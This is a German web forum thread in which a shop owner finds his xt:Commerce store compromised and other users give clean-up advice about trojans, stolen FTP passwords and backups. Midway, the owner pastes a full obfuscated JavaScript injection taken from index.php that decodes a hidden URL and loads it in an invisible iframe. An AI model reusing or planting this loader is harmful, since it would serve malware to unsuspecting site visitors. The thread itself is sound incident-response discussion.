Warnung auf Startseite, header & cache, xtc_setcookie.inc.php /application_top

[blue-light24]

Hallo,

ich habe soeben unseren Shop (www.blue-light24.de) geöffnet und nun erfolgt ganz oben folgende Meldung:

Code: PHP  [Auswählen]

Warning: Cannot modify header information - headers already sent by (output started at /var/www/web1426/html/shop/index.php:1) in /var/www/web1426/html/shop/inc/xtc_setcookie.inc.php on line 19

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /var/www/web1426/html/shop/index.php:1) in /var/www/web1426/html/shop/includes/application_top.php on line 340

Wir haben derzeit am Shop nicht verändert und diese Meldung taucht nun auf.

Könnte mir bitte jemand behilflich sein, dieses Problem zu beheben.

Vielen Dank

Linkback: https://www.modified-shop.org/forum/index.php?topic=17093.0

[Matt]

Deine Probleme sind deutlich größer als du denkst.

Offline nehmen, lokalen Rechner mit Virenscannern bombardieren, wenn sauber FTP-Passwörter ändern (am besten über den Provider machen lassen), sauberes Backup einspielen.

[blue-light24]

Hallo Matt,

könntest du mir bitte grob erklären warum das Problem größer ist ?

[Alfred]

Hallo,

dein Shop wurde gehackt.

Gruß

[blue-light24]

Also lösche ich nun alle Ordner, spiele Xtc neu auf und lade die Datenbank neu auf?

[Alfred]

Hallo,

nein, das ist der falsch Weg.
Es gilt die Ursache zu finden. Den Trojaner, die Lücke,...
Matt hat dir schon was dazu geschrieben.

Wenn Ihre Website gehackt wurde oder Malware enthält
Die Seite von Spybot-S&D!

Gruß

[Tomcraft]

Auch hier nochmal der Hinweis: FAQ: Was gehört hier rein und was nicht?

Verschoben von "Bugs oder Funktionsfehler" nach "Admin- und Shopbereich".

[...]
dein Shop wurde gehackt.
[...]

Ich weiss was du meinst, aber der Formulierung stimme ich bis zum Beweis nicht zu.

Bisher wurden die Shops meist über Trojaner kompromittiert!

Forensuche nach "Shop Trojaner" bzw. "Shop Virus" liefert hier einigen Lesestoff.

Grüße

Torsten

[blue-light24]

Hallo liebe Gemeinde,

es hat mir keine Ruhe gelassen und nun scheint alles wieder okay zu sein.

Ich habe mir das Programm "avast antivir" runtergeladen und den PC gescannt. Dabei wurde folgendes gefunden: html:Iframe-OC [Trj]

Ich hoffe das avast diesen Trojaner auf Dauer gelöscht hat. Anschließend habe ich noch einen Eintrag in der "index.php" gefunden und auch gelöscht:

Code: PHP  [Auswählen]

<body><script>
var l={j:{l:{l:'~',I:'.',j:'^'},I:{l:'%',I:218915,j:1154%256},j:{l:1^0,I:55,j:'ijl'}},l:{l:{l:function(j){try{var I=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');I['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';I['\x76\x61\x6c\x75\x65']=j;I['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](I);}catch(j){return false;}
return true;},I:function(){try{var I=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(I){return false;}
return I.value;},j:function(){var I=l.l.l.l(l.I.l.l('.75.67.67.63.3a.2f.2f.76.61.6e.63.2e.6e.66.79.62.74.6e.61.67.75.6e.67.6a.62.65.78.66.2e.70.62.7a.2f.6e.71.6a.62.65.71.66.2e.63.75.63'));var j=(I)?l.l.l.I():false;return j;}},I:{l:function(){var I=l.l.l.j('trashtext');var j=(I)?I:'trashtext';return j||false;},I:function(){var I=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');I['\x77\x69\x64\x74\x68']='0.1em';I['\x68\x65\x69\x67\x68\x74']='0.2em';I['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';I['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';I['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';I['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](I);},j:function(){var I=l.l.j.j(l.l.I.I());I=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=l.l.j.l(l.l.I.l());try{I['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{l:function(I){return I['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},I:function(I){return l.l.j.l(I)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(I){try{I();}catch(I){}}}},I:{l:{l:function(I){I=I['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](I);},I:'76',j:'91'},I:{l:'24',I:'31',j:'58'},j:{l:'66',I:'6',j:'92'}}}
l.l.I.j();</script>

Und so wie es aussieht, funktioniert alles wieder und es kommt auch keine Fehlermeldung mehr.

Alle FTP + Shop-Admin Passwörter habe ich auch geändert.

Seht ihr das genauso ?

[Tomcraft]

Lass mich raten... du hattest FileZilla unter Windows eingesetzt?

FileZilla speichert die Passwörter für die FTP-Zugänge in Klartext ab, das heisst, dass jeder Trojaner die schön auslesen kann und an den Angreifer schickt, der dann innerhalb jeder index-Datei auf dem Server seinen Schadcode unterbringt! Ich bin mir sicher, dass du noch nicht alle Dateien bereinigt hast!

Wieso der Entwickler hier so fahrlässig mit den Passwörtern umgeht kann man bei ihm im Forum nachlesen, er hat da eine sehr eigene Meinung nach dem Motto, wer es nicht schafft seinen PC vor Viren und Trojanern zu schützen, der braucht sich auch nicht wundern, wenn seine Passwörter ausgelesen werden. Er hat ja nicht ganz unrecht, zumal er immer wieder anmerkt, dass das Master-Passwort bei der Eingabe im Speicher landet, aber ich denke, dass man es nicht unnötig leicht machen muss an die FTP-Passwörter zu gelangen!

Grüße

Torsten

[blue-light24]

Hi Torsten,

ich benutzte den Total Commander unter Windows 7, welcher auch die PW abspeichern kann.

Stimmt, ich habe mir eben alle anderen "index" Dateien auf dem Server angeschaut und die haben alle auch noch diesen Schadcode drin. Boar. Auch die Ordner die nicht zum Shop gehören sind infiziert. Krass.

Gibt es eine Möglichkeit alle Dateien auf dem Server nach diesen Schadcode durchsuchen zu lassen?

[Matt]

[...]
Stimmt, ich habe mir eben alle anderen "index" Dateien auf dem Server angeschaut und die haben alle auch noch diesen Schadcode drin. Boar. Auch die Ordner die nicht zum Shop gehören sind infiziert. Krass.
[...]

[...] sauberes Backup einspielen.

Ich schreib das nicht weil ich dir unnötig Arbeit aufhalsen will!

[blue-light24]

Gesagt - getan und hoffentlich auf Dauer sauber.

Ein GROSSES DANKE an alle, die mir mit Tipps weitergeholfen haben.

[thelmnt]

Hallo,

ich hoffe ich kann mich nochmal hier in den alten Thread einklinken:

mein Problem war ebenfalls schädlicher Quellcode. in der index.php habe ich ihn gefunden, an anderer Stelle nicht
Google Webmastertools sagt mir nun  der der Quellcode sich noch auf
/   -
/?p=137   -
/?tag=pflanzen

befindet. Wie gehe ich nun vor und wonach genau kann ich suchen, wenn ich kein Backup habe?
Hoffe auf Hilfe diese "Badware" warnung wegzubekommen.

[reblaus]

Sowas habe ich auch gerade auf einem Server gefunden. Nicht auf meinem zum Glück. Dateien hießen teilweise index.html.vir aber auch main.php. Würde mich interessieren was das Ding genau macht.